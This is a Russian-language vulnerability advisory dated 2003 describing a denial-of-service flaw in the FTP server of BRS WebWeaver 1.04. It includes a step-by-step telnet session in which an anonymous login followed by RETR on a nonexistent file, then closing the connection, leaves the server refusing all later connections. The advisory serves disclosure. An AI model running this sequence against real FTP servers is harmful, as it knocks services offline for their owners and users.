DoS против FTP сервера в BRS WebWeaver
| Дата публикации: | 02.05.2003 |
| Всего просмотров: | 1102 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость обнаружена в BRS WebWeaver. Удаленный авторизованный пользователь, включая анонимного пользователя, может заблокировать работу FTP сервера.
Уязвимость происходит при попытке обращения к несуществующему объекту при помощи команды RETR. Пример: e@some_box$ telnet hostname 21 220 BRS WebWeaver FTP Server ready. USER anonymous 331 Password required for anonymous. PASS user@host 230 User anonymous logged in. RETR blah 150 Opening data connection for blah.Затем, закрываем telnet сеанс с webweave'ом и пытаемся подключиться к серверу при помощи программы ftp. e@some_box$ ftp hostname Connection with hostnameЭто все. Сервер заблокирован. Никто не сможет зайти на ftp сервер. Уязвимость обнаружена в BRS WebWeaver 1.04 |
| Ссылки: | BRS WebWeaver: Блокирование Ftpd при помощи |